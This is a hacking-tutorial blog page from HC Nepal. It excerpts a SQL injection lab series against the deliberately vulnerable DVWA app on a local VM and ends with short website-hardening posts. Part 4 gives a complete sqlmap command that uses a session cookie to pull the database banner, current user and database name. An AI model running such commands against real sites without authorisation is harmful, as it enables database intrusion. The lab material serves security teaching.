SQL injection lab PT.4 – Using SqlMap to Obtain Current User and Database

AD : 45 ways to earn money online. Get youtube videos here free :  https://www.youtube.com/playlist?list=PLEG4CvuvNZdcyHYi5g3I9AR6zrDEUXw0X

Welcome back Gurkhas ! …in SQL injection lab PT.4 

By : Bijay Acharya  | Add him in Facebook here >https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > >Student Video Tutorial 

Section 10: Using SqlMap to Obtain Current User and Database 

1. Verify sqlmap.py exists
o Instructions:
1. cd /pentest/database/sqlmap
2. ls -l sqlmap.py

14-sqlmap

2. Obtain Database User For DVWA
o Notes(FYI):
1. Obtain the referer link from (Section 9, Step
10), which is placed after the “-u” flag below.
2. Obtain the cookie line from (Section 9, Step 10),
which is placed after the “–cookie” flag below.
3. Replace 192.168.1.106 with Fedora’s IP address
obtained in (Section 3, Step 3).
4. Replace (lpb5g4uss9kp70p8jccjeks621) with your
PHPSESSID obtained from (Section 9, Step 10).
o Instructions:
1. ./sqlmap.py -u
“http://192.168.1.106/dvwa/vulnerabilities/sqli/?
id=1&Submit=Submit” —

cookie=”PHPSESSID=lpb5g4uss9kp70p8jccjeks621;
security=low” -b –current-db –current-user
 -u, Target URL
 –cookie, HTTP Cookie header
 -b, Retrieve DBMS banner
 –current-db, Retrieve DBMS current database
 –current-user, Retrieve DBMS current user
o

15-sql-map

3. Do you want to keep testing?
o Instructions:
1. keep testing? y
2. skip payloads? y

16-sqlmap

4. Viewing Results
o Instructions:
1. For the web application DVWA, the database name
is “dvwa” and the programs that communicate with
the database is “root@localhost”;

17-sql-map

….Ok Gurkhas, we’ll continue this in next part.  Check out our social network site for hackers here > hcnepal.com

534 total views, no views today

SQL injection lab PT.3 – Extracting/Obtaining PHP Cookie – HC Nepal

Welcome back Gurkhas ! …in SQL injection lab PT.3

By : Bijay Acharya  | Add him in Facebook here >https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > >Student Video Tutorial

Section 9: Obtain PHP Cookie
1. SQL Injection Menu
o Instructions:
1. Select “SQL Injection” from the left navigation
menu.

5 php

2. Select Tamper Data
o Instructions: Read More …

252 total views, no views today

SQL injection lab PT.2 – DVWA Login + Low Security Level Submit – HC Nepal

Welcome back Gurkhas ! …in SQL injection lab PT.2

By : Bijay Acharya  | Add him in Facebook here >https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > >Student Video Tutorial

Let’s start part 2.

Open Console Terminal and Retrieve IP Address
1. Open a console terminal
o Instructions:
1. Click on the console terminal

1 console terminal

2. Get IP Address Read More …

604 total views, no views today

SQL injection lab PT.1 – Intro/Lab setup – HC NEPAL

Hello Gurkhas ! ! !

In this lab, We’ll begin the series of SQL Injection. This will be Part-Wise Article/Guide on SQL Injection.

By : Bijay Acharya  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > > Student Video Tutorial

  • Let’s start from LAB setup :
    > Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
    > Check IP address of both devices.
  • Step-by-step instruction
    1. Open Kali Linux (or BT 5r3)
    2. Open your browser and type http://IP address of
    Metasploitable/dvwa/login.php
    Read More …

814 total views, no views today

sqlmap – Automatic SQL injection and database takeover tool

Introduction

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

Read More …

307 total views, no views today

How to Secure Your WordPress Website From Hackers

Millions of websites are powered by WordPress software and there’s a reason for that. WordPress is the most developer-friendly content management system out there, so you can essentially do anything you want with it. Unfortunately, that has some downsides as well.

For example, if you don’t change your default configuration, hackers and some pesky users with too much curiousity immediately know where to log in to get into your admin area. In WordPress, you can just type in domain.com/wp-admin and it will take you right to the login screen. At that point, it’s all about trying to crack your password. The most common method hackers use is brute force, which allows them to test millions of login combinations in a short amount of time.

Giving Hackers a Difficult Time

There’s a few different preventive measures you can take in order to minimize the risk of getting your website hacked.

cracked security code

© igor – Fotolia.com

Back Up Your Website Often

Obviously, it depends on how often your website gets updated, but I would suggest at least a weekly backup.

READ FULL ARTICLE HERE

252 total views, no views today

[3 Steps] : Protect Your Website From Hackers

As a webmaster, is there anything more terrifying than the thought of seeing all of your web-developed work being altered or wiped out entirely by a nefarious hacker?  You’ve worked hard on your website – so take the time to protect it by implementing basic hacking protections!

In addition to regularly backing up your files (which you should already be doing, for various reasons), taking the following three easy steps will help to keep your website safe: Read More …

174 total views, no views today